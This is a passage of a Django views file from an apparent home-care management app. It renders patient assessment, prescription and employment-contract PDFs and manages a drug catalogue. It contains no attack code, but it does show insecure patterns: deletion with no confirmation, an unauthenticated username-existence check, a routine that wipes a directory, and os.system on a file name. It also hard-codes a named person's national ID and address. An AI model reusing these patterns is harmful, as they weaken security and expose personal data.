10)\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(124,y,\"Saca la ropa del closet viste y \")\t\n\t#\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Independiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,y,\"Controla totalmente efinters\")\n\ty=y-15\n\tc.drawString(290,y,\"anal y vertical\")\t\n\t#\n\tc.drawString(50,y,\"desviste. Se excluye el anudar los cordones\")\n\t#\n\t#segundo bloque\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Dependiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(358,y,\"Incontinencia total o parcial\")\n\t#\n\t#y=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(119,y,\"No se viste solo, o lo hace a medias\")\t\n\t#\n\t#segundo bloque\n\ty=y-15\n\tc.drawString(290,y,\"para orinar u obrar: control parcial o total por enemas o\")\n\ty=y-15\n\tc.drawString(290,y,\"sondas o recolectores o uso regulado de chata\")\n\t#\n\t#return HttpResponse(str(y)) # \ty=154 \n\ty=162\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Ir al Toilet:\")\n\tc.setFont('Helvetica', 10)\n\tc.setFont('Helvetica-Bold', 10)\t\n\ty=y-15\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(124,y,\"llega al baño, se sienta y para el\")\t\n\ty=y-15\n\tc.drawString(50,y,\"del Toilet, se arregla la ropa y se limpia\")\n\t#\n\t#segundo bloque\n\tz=139\n\t#return HttpResponse(str(y)) # y=139\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Alimentación:\")\t\n\tc.setFont('Helvetica', 10)\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(puede usar su propia chata en la noche y\")\n\ty=y-15\t\n\tc.drawString(50,y,\"usar soportes mecánicos)\")\n\n\t#segundo bloque\n\tz=z-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Independiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,z,\"lleva la comida del plato a la boca (se excluye\")\n\t#\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica',10)\n\tc.drawString(118,y,\"Requiere ayuda durante su estadia\")\n\ty=y-15\n\tc.drawString(50,y,\"en el 
toilete, o al usar chata (bedpan)\")\n\t#\n\t# segundo bloque\n\tz=z-15\n\tc.drawString(290,z,\"lleva la comida del plato a la boca (se excluye\")\n\tz=z-15\n\tc.drawString(290,z,\"el cortar la carne o preparar la comida)\")\n\t#\n\t#segundo bloque\n\tz=z-15\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,z,\"Dependiente:\")\t\n\tc.setFont('Helvetica', 10)\n\tc.drawString(364,z,\"Requiere asistencia para comer; no come\")\n\tz=z-15\n\tc.drawString(290,z,\"o usa alimentación entera o parental\")\n\t#\n\ty=y-30\n\tc.setFont('Helvetica-Bold', 12)\t\n\tc.drawString(50,y,\"OBSERVACIONES:\")\n\tc.setFont('Helvetica',10)\n\t#\n\t# linea para las observaciones\n\tc.line(50, y-15, 570, y-15) \n\n\t# linea vertical separadora de los blques\n\t# x y x1 y1 \n\tc.line(286, 325, 286, 60) \n\n\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n#\n#\n#@login_required(login_url='login_ini')\n#def gestionremota2(request):\n#\tESTA FUNCION ESTÁ EN viwes2.py\n#\n#\n@login_required(login_url='login_ini')\ndef grid_receta(request):\n\tvariable1 = 'Recetas del paciente'\n\tvariable2 = 'Paciente:'\n\t# DICCIONARIO\n\tvia_lista = {'1':'Oral','2':'Inyectable','3':'Intranasal','4':'Rectal','5':'Sublingual',\n\t'6':'Endovenosa','7':'Intramuscular','8':'Subcutaneo','9':'Transdermico','10':'Inhalación',\n\t'11':'Sonda Nasogastrica','12':'Aplicación Tópica'}\n\n\tlogo_pdf = \"/static/img/logopdf.png\"\n\trut_aux = request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\n\t#rut_aux = paciente.rut\n\tpaciente_id = paciente.id\n\treceta = Receta.objects.filter(rut=paciente.rut).order_by('descrip')\n\tcuenta = receta.count()\n\tcontext = {\n\t\t'receta':receta,\n\t\t'paciente':paciente,\n\t\t'variable1':variable1,\n\t\t'variable2':variable2,\n\t\t'logo_pdf':logo_pdf,\n\t\t'nombre':paciente.nombre,\n\t\t'rut_aux':rut_aux,\n\t\t'paciente_id':paciente_id,\n\t\t'via_lista':via_lista,\n\t\t'cuenta':cuenta,}\n\treturn render(request,'grid_receta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef fichafarmaco(request,id):\n\tvariable1 = 'Ingresando / Actualizando Receta'\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day \n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\tfecha_digita = str(ano_hoy)+\"-\"+str(mes_hoy).zfill(2)+\"-\"+str(dia_hoy).zfill(2) + \" 00:00:00\" \n\t#\n\t# LISTA\n\tvia_lista = ['Oral','Inyectable','Intranasal','Rectal','Sublingual',\n\t'Endovenosa','Intramuscular','Subcutaneo','Transdermico','Inhalación',\n\t'Sonda Nasogastrica','Aplicación Tópica']\n\n\tpaciente = Pacientes.objects.get(id=id)\n\tform = RecetaForm(request.POST or None)\n\n\treceta = Receta\n\tcontext = {\n\t\t\t\"receta\":receta,\n\t\t\t\"form\":form,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"rut\":paciente.rut,\n\t\t\t\"paciente\":paciente.nombre,\n\t\t\t\"via_lista\":via_lista,}\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\t# aqui van los campos que requieren un tratamiento antes de grabar sus valores\n\t\t\tfecha_pre = request.POST.get('fecha_prescri')+\" 00:00:00\" # fecha de prescripcion\n\t\t\tvia_x = request.POST.get('via_sumi') # viene de combobox - alimentado de una lista\n\t\t\tvia_x = int(via_x) + 1 # llega como string \n\t\t\t#\n\t\t\tcursor = connection.cursor() #es necesario: 
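from django.db import connection\n\t\t\t# Hedged ORM sketch (assumption: the Receta model fields mirror the ai_receta\n\t\t\t# columns used below); the parameterized INSERT could then be written as:\n\t\t\t# Receta.objects.create(rut=paciente.rut, descrip=request.POST.get('descrip'),\n\t\t\t#\tfecha_prescri=fecha_pre, via_sumi=str(via_x),\n\t\t\t#\tfrecuencia=request.POST.get('frecuencia'), fecha_digita=fecha_digita)\n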
\t\t\tcursor.execute(\"insert into ai_receta (rut,descrip,fecha_prescri,via_sumi,frecuencia,fecha_digita) \"\n\t\t\t\t\"values(%s,%s,%s,%s,%s,%s)\",\n\t\t\t\t[paciente.rut,\n\t\t\t\trequest.POST.get('descrip'),\n\t\t\t\tfecha_pre,\n\t\t\t\tstr(via_x),\n\t\t\t\trequest.POST.get('frecuencia'),fecha_digita])\n\n\t\t\treturn redirect('grid_receta')\n\treturn render(request,'ficha_receta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef eliminafarma(request,id):\n\tvariable1 = 'Eliminación de farmaco desde la receta'\n\tsw1 = 'rec' # identificador para la template 'confirma_elimina.html'\n\tform = Receta.objects.get(id=id)\n\tdescrip = form.descrip\n\tcontext = {\n\t\t'form':form,\n\t\t'variable1':variable1,\n\t\t'descrip':descrip,\n\t\t'sw1':sw1,}\n\tif request.method == \"POST\":\t\n\t\tform.delete()\n\t\treturn redirect('grid_receta')\t#redirige a la URL\n\treturn render(request,'confirma_elimina.html',context)\n\n\n\n@login_required(login_url='login_ini')\ndef imprimereceta(request):\n\t# DICCIONARIO\n\tvia_lista = {'1':'Oral','2':'Inyectable','3':'Intranasal','4':'Rectal','5':'Sublingual',\n\t'6':'Endovenosa','7':'Intramuscular','8':'Subcutaneo','9':'Transdermico','10':'Inhalación',\n\t'11':'Sonda Nasogastrica','12':'Aplicación Tópica'}\n\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"receta\"+nombrearch()+\".pdf\" # receta del paciente\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\treceta = Receta.objects.filter(rut=rut_aux).order_by('descrip')\n\n\t#if receta.descrip == None:\n\t#\tcontext = {\n\t#\t'receta':receta,\n\t#\t'paciente':paciente,\n\t#\t'variable1':'Recetas del paciente',\n\t#\t'variable2':variable2,\n\t#\t'logo_pdf':logo_pdf,\n\t#\t'nombre':paciente,}\n\t#\trender_template_to_response(\"grid_receta.html\", context)\t\n\t\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n\t# ######### COMIENZA EL REPORTE #####################################\t\t\n ## comienza primera pagina #########\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tc.setFont('Helvetica-Bold',11)\n\tc.setLineWidth(.5)\n\tfila = 700\n\ttit = \"RECETA DEL PACIENTE\"\n\tc.drawString(230,fila+24,tit)\n\t# subrayado\n\tc.line(230, fila+16, 357, fila+16) \n\n\t#sub-titulo\n\tc.drawString(50,fila-20,\"Paciente: \"+paciente.rut+\" \"+paciente.nombre)\n\n\tc.setFont('Helvetica',11)\n\n\t# fecha actual \n\tc.drawString(480,fila+50,\"Emisión: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\n\t# COMIENZA DEFINICION DE LISTADO\n\t#\n\tfila = 665\n\tc.line(50, fila, 550, fila) \n\tfila = fila - 15\n\tc.drawString(50,fila,\"Descripción\")\n\tc.drawString(180,fila,\"Frecuencia\")\n\tc.drawString(280,fila,\"Via suministro\")\n\tc.drawString(378,fila,\"Fecha 
de prescripción\")\n\tfila = fila - 15\n\tc.line(50, fila,550,fila) \n\t#\n\tfor rece in receta:\n\t\tfila=fila-15\n\t\tc.drawString(50,fila,rece.descrip)\n\t\tc.drawString(180,fila,rece.frecuencia)\t\t\n\t\tc.drawString(280,fila,via_lista[rece.via_sumi])\n\t\tfe = fecha_ddmmaaaa(rece.fecha_prescri) # entrega dd-mm-yyyy\n\t\tc.drawString(380,fila,fe)\n\n\tfila = fila -15\t\n\tc.line(50, fila,550,fila) \n\n\t#for rece in receta:\n\t#\tdata.append([[rece.descrip,rece.frecuencia,via_lista[rece.via_sumi],str(rece.fecha_prescri)[0:10]]])\n\n\t## ######## FIN DEL REPORTE #######################################\n\t#\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef farmacos(request):\n\tvariable1 = 'Base de datos de fármacos'\n\tmaefarm = Maefarm.objects.all().order_by('descrip')\n\tif request.method == \"POST\":\t\n\t\tbuscar = request.POST.get('buscar') # valor del template\t\t\n\t\tcheck1 = request.POST.get('check1') # valor del template\n\t\tif check1 == None: \n\t\t\t#return HttpResponse(str(check1))\n\t\t\tif buscar=='':\n\t\t\t\tmaefarm = Maefarm.objects.all().order_by('descrip')\n\t\t\telse:\t\n\t\t\t\tmaefarm = Maefarm.objects.filter(Q(descrip__icontains=buscar))\n\t\telse:\t\n\t\t\tmaefarm = Maefarm.objects.filter(Q(accionf__icontains=buscar))\n\tcuenta = 0\n\tfor ss in maefarm:\n\t\tcuenta = cuenta + 1\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"maefarm\":maefarm,\n\t\t\"cuenta\":cuenta,}\t\n\treturn render(request,'grid_farmacos.html',context)\n\n\n@login_required(login_url='login_ini')\ndef addlinkfarmaco(request,id):\n\tvariable1 = 'Agregando Hiperlink al Farmaco / Suministro'\n\tvariable2 = ''\n\n\t# DOS LINEAS OBLIGATORIAS\n\tmaefarm = Maefarm.objects.get(id=id) # contiene los datos de los campos de la tabla\n\tform = MaefarmForm(request.POST or None, request.FILES or None,instance=maefarm)\n\t###\n\t#\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\tcursor = connection.cursor() # es necesario: from django.db import connection\t\n\t\t\tcursor.execute(\n\t\t\t\"update ai_maefarm set link = %s where id = %s\",[maefarm.link,id])\n\t\t\treturn redirect('farmacos')\n\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"form\":form,\n\t\t\"variable2\":variable2,\n\t\t}\n\treturn render(request,'ficha_linkfarmaco.html',context)\n\n\n@login_required(login_url='login_ini')\ndef Eliminafarmaco(request,id):\n\tform = Maefarm.objects.get(id=id)\n\t#messages.warning(request,\"Listo para borrar este farmaco\")\n\tform.delete()\n\treturn redirect('farmacos') # redirige a la URL\n\n@login_required(login_url='login_ini')\ndef csvfarmacos(request):\n\titems = Maefarm.objects.all().order_by('descrip')\n\tresponse = HttpResponse(content_type = 'text/csv')\n\tresponse['Content-Disposition'] = 'attachment;filename=\"farmaco.csv\"'\n\twriter=csv.writer(response,delimiter=';')\n\n\t#nombre de los campos\n\twriter.writerow(['cod','descrip','accionf','unidad','codbar','unient','conten','id'])\n\n\t#contenido d elos campos\n\tfor obj in items:\n\t\twriter.writerow([obj.cod,obj.descrip,obj.accionf,obj.unidad,obj.codbar,obj.unient,obj.conten,obj.id])\n\treturn response\n\n\n### PARA PRUEBA #####\ndef 
validate_username(request):\n username = request.GET.get('username', None)\n data = {\n 'is_taken': User.objects.filter(username__iexact=username).exists()\n }\n return JsonResponse(data)\n\n### PARA PRUEBA #####\ndef siexiste_cui(request):\n \treturn HttpResponse ('hello world!')\n\t#rut_x = request.GET.get('rut', None)\n\t#return HttpResponse(\"llegó con el rut: \"+str(rut_x))\n\t#resultado = cuidador.objects.filter(rut=rut_x).exists()\n\t#data ={'resultado':resultado}\n\t#return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\n@login_required(login_url='login_ini')\ndef contrato(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"contrat_cui\"+nombrearch()+\".pdf\" # gestion remota\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\tid_x = request.session.get('id_x') # recupera valor desde variable global\n\tcuidador = Cuidadores.objects.get(id=id_x)\n\n\tfe_ini_y = cuidador.fe_ini\n\tif cuidador.fe_ini == None:\n\t\treturn HttpResponse(\"Fecha de inicio en la empresa está en blanco, completela !!\")\n\n\tfe_ini_y = cuidador.vence_contrato\n\tif cuidador.vence_contrato == None:\n\t\treturn HttpResponse(\"Fecha de VENCIMIENTO DEL CONTRATO está en blanco, completela !!\")\n\n\tfe_nac_y = cuidador.fe_nac\n\tif cuidador.fe_nac == None:\n\t\treturn HttpResponse(\"Fecha de nacimiento está en blanco, completela !!\")\n\n\tecivil_y = cuidador.ecivil\n\tif cuidador.ecivil == None:\n\t\tecivil_y = \"2\"\n\n\tnacionalidad_x = cuidador.nacionalidad\t\n\tif cuidador.nacionalidad == None or cuidador.nacionalidad == '':\n\t\tnacionalidad_x = \"CHILENA\"\n\n\tafp_y = cuidador.afp\n\tif cuidador.afp == None or cuidador.afp == '':\n\t\treturn HttpResponse(\"Institución previsional está en blanco, complétela !!\")\n\n\tsalud_y = cuidador.salud\n\tif cuidador.salud == None or cuidador.salud == '':\n\t\treturn HttpResponse(\"Institución de salud está en blanco, complétela !!\")\n\n\tecivil_x = Param.objects.get(tipo='ECIVI',codigo=ecivil_y)\n\tregion_x = Param.objects.get(tipo='REGI',codigo=cuidador.region)\n\tcomuna_x = Param.objects.get(tipo='COMU',codigo=cuidador.comuna)\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n\t# ######### COMIENZA EL REPORTE #####################################\t\t\n ## comienza primera pagina #########\n\tc.drawImage(logo_corp, 10, 710,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tc.setFont('Helvetica-Bold',11)\n\tc.setLineWidth(.5)\n\tfila = 700\n\ttit = \"CONTRATO DE TRABAJO\"\n\tc.drawString(230,fila+24,tit)\n\t# subrrayado\n\tc.line(230, fila+16, 368, fila+16) \n\t#\n\tc.setFont('Helvetica',11)\n\t#\n\t# fecha actual \n\tc.drawString(480,fila+50,\"Emisión: \"+str(fecha_actual())) # fecha_actual() en misfunciones.py\n\t#\n\t#\n\t# COMIENZA DEFINICION DE LISTADO\n\tfila = 675\n\t#fila = fila - 15\n\tc.drawString(50,fila,\"En Santiago, a \"+fecha_palabra(fe_ini_y)+\", entre ASISTENCIA INTEGRAL LIMITADA, representada por\")\n\tfila = fila - 
15\n\tc.drawString(50,fila,\"ANTONIO J. ANTONIO CASTILLO ROJAS, RUT: 13.477.178-K, en adelante 'el empleador', domiciliado\")\n\tfila = fila - 15\n\tc.drawString(50,fila,\"en CALLE EL OLIVILLO 6036, comuna de PEÑALOLEN, cuidad de SANTIAGO, y don(ña):\")\n\tfila = fila - 15\n\tc.drawString(50,fila,cuidador.nombre+\", en adelante 'el trabajador', CI: \"+cuidador.rut)\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"de nacionalidad \"+nacionalidad_x)\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"estado civil: \"+str(ecivil_x)+\", nacido el \"+fecha_palabra(fe_nac_y)+\", con domicilio en:\")\t\n\tfila = fila - 15\n\tc.drawString(50,fila,cuidador.direccion+\", comuna de \"+str(comuna_x)+\", región \"+str(region_x)+\", se\")\t\n\tfila = fila - 15\n\tc.drawString(50,fila,\"ha convenido el siguiente contrato de trabajo: \")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"PRIMERO: La empresa ASISTENCIA INTEGRAL LIMITADA, contrata a\")\t\n\n\tc.setFont('Helvetica-Bold',11)\n\tfila = fila - 15\n\tc.drawString(75,fila,cuidador.nombre)\t\n\tc.setFont('Helvetica',11)\n\n\tfila = fila - 15\n\tc.drawString(75,fila,\"quien acepta y se compromete a relizar el trabajo de asistente de enfermos y/o Cuidador(a) de\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de enfermos, o cualquier otra labor a fin que le encomiende el empleador o sus superiores.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEGUNDO: El trabajador(a) deberá prestar sus servicios de manera DOMICILIARIA donde la empresa\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"mantenga contrato, dentro de la ciudad de Santiago.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"TERCERO: La jornada de trabajo sera la siguiente:\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"De lunes a domingo, entre 8:00 y 20:00 horas con descansos para la alimentación de una hora\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de colación entre las 13:00 y las 15:00 horas, asimismo la jornada podrá ser ditribuida conforme\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"a los requerimientos de cada paciente asignado no superando el maximo de 45 horas semanales.\")\t\n\tfila = fila - 30\n\tc.drawString(50,fila,\"CUARTO: La remuneración del trabajador será la suma mensual de $301.000.- sueldo base\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"(trrescientos mil pesos), mas el 25% de gratificación legal, con tope de 4,75 ingresos minimos\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"anuales, los que serán cancelados por turnos realizados, y que serán liquidados y pagados por \")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"períodos vencidos, en las oficinas del empleador, el dia 5 del mes siguiente asl trabajado.\")\t\n\n\tfila = fila - 15\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(75,fila,\"Otras asignaciones:\")\t# titulo de la table\n\tc.setFont('Helvetica', 11)\n\tfila = fila - 15\n\t#\n\t# COMIENZA TABLE #######################\n\tdata = [\n\t\t[\"Alimentación\",\"$15.000\"],\n\t\t[\"Asignación de movilización\",\"$25.000\"],\n\t\t[\"Asignación domiciliaria\",\"$30.000\"],\n\t]\n\t#\n\tt = Table(data, rowHeights=20, colWidths=[150,200]) # 20=Alto de fila\n\t#\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n#\n\tw, h = t.wrap(100, 100) # obligatorio\n\tt.drawOn(c, 75, 220, 0)\t# 
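posicion de la tabla: abscisa=75, ordenada=240\n\t#\n\t# Hedged refactor sketch (illustrative only, not wired in): the Table/TableStyle\n\t# boilerplate repeated across these reports could be centralized in a helper:\n\t# def tabla_basica(data, **kw):\n\t#\tt = Table(data, **kw)\n\t#\tt.setStyle(TableStyle([\n\t#\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t#\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t#\t]))\n\t#\treturn t\n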
\tfila = 205\n\tc.drawString(70,fila,\"-El bono de asignación domiciliaria se otorgará siempre y cuando el o la asistente se encuentre\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"prestando servicios fuera de los lugares considerados como Establecimientos de Salud.\")\n\tfila = fila - 15\n\tc.drawString(70,fila,\"-Los turnos anexos tendrán un valor por jornada de $16.000, los cuales serán de tipo voluntario\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"e incluidos en su totalidad en la liquidación mensual del trabajador.\")\n\tfila = fila - 30\n\tc.drawString(50,fila,\"QUINTO: Son obligaciones esenciales del trabajador, cuya infracción las partes entienden como causa\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"justificada de terminación del presente contrato, las siguientes:\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"a) Cuidar y mantener en perfecto estado de conservación, las máquinas, útiles y otros bienes \")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"de la empresa\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"b) Cumplir las instrucciones y órdenes que le imparta cualquiera de sus superiores\")\t\n\n\tc.showPage() #salto de pagina ######### salto de pagina ######### salto de pagina #########\n\tfila = 710\n\tc.drawString(75,fila,\"c) En casos de inasistencia al trabajo, por enfermedad, el trabajador deberá justificarla con el\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"correspondiente certificado médico, otorgado por un facultativo, dentro del plazo de 48\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"horas siguientes, desde el día aquel que dejó de asistir al trabajo.\")\t\n\n\tfila = fila - 30\n\tc.drawString(75,fila,\"d) Todo lo señalado en el reglamento interno que se adjunta.\")\t\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEXTO: Se prohíbe al trabajador, efectuar negocios o actividades dentro del giro de la empresa,\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"que es aquel en que opera el empleador.\")\t\n\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Así mismo se le prohíben los siguientes actos:\")\t\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"1.-Ejecutar durante la jornada de trabajo, actividades ajenas a las actividades de la empresa.\")\t\n\t\n\tfila = fila - 15\n\tc.drawString(60,fila,\"2.-Dañar la imagen de la empresa u opiniones que trasgredan la ley.\")\t\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"3.-Usar en beneficio propio las instalaciones y/o muebles, útiles de la empresa, o\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"cualquier acto que dañe el patrimonio de esta.\")\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"4.-Efectuar tareas para las que fue contratado en forma negligente que impliquen\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"daños patrimoniales o mermas en los ingresos de la empresa.\")\n\n\tfila = fila - 15\n\tc.drawString(60,fila,\"5.-Realizar negociaciones con los pacientes asignados o los familiares de estos.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"SEPTIMO: Este contrato tendrá vigencia hasta el \"+fecha_palabra(cuidador.vence_contrato)+\". 
Las partes pueden\")\t\n\tfila = fila - 15\n\tc.drawString(75,fila,\"ponerle término en común acuerdo.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"OCTAVO:Se deja constancia que el trabajador ingresó al servicio del empleador el 19 de\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"septiembre de 2019.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"NOVENO: Se deja constancia que el trabajador cotizará en el régimen previsional chileno,\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"comprometiéndose el empleador a efectuar las retenciones y entregarlas a las\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"instituciones correspondientes.\")\n\tfila = fila - 30\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(75,fila,\"Institución de previsión: \"+afp_y+\" Salud: \"+salud_y)\n\tc.setFont('Helvetica', 11)\n\tfila = fila - 30\n\tc.drawString(50,fila,\"DECIMO: Para todos los efectos derivados de este contrato, las partes fijan su domicilio en la\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"ciudad de Santiago y se someten a la jurisprudencia de sus tribunales.\")\n\n\tfila = fila - 30\n\tc.drawString(50,fila,\"DECIMO PRIMERO: El presente contrato se emite en dos ejemplares. Cada ejemplar está compuesto\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"por dos hojas. Previa lectura, en señal de aceptación, se ratifica y firman las partes, Se deja\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Cosntancia que el trabajador recibe un ejemplar íntegro de este contrato.\")\n\n\tfila = fila - 60\n\tc.line(75, fila, 255, fila)\n\tc.line(330, fila, 485, fila)\n\tfila = fila - 15 \n\tc.drawString(75,fila,\"ASISTENCIA INTEGRAL LTDA.\")\n\tc.drawString(330,fila,cuidador.nombre)\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Antonio J. Castillo Rojas.\")\n\tc.drawString(330,fila,\"Trabajador(a)\")\n\tfila = fila - 15\n\tc.drawString(75,fila,\"Representante Legal\")\n\t## ######## FIN DEL REPORTE #######################################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\t#produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef coordenadas(request):\n\tvariable1 = 'Agregando coordenadas a la dirección de pernoctación del paciente'\n\tvariable2 = ''\n\trut_aux = request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\t# DOS LINEAS OBLIGATORIAS\n\tform = PacientesForm(request.POST or None, request.FILES or None,instance=paciente)\n\tcoordenadas = request.POST.get('coordenadas') # valor del template\n\tpaciente_id = paciente.id\n\tif request.method == \"POST\":\n\t\t#if form.is_valid():\n\t\t#return HttpResponse(str(request.method))\n\t\tcursor = connection.cursor() # es necesario: from django.db import 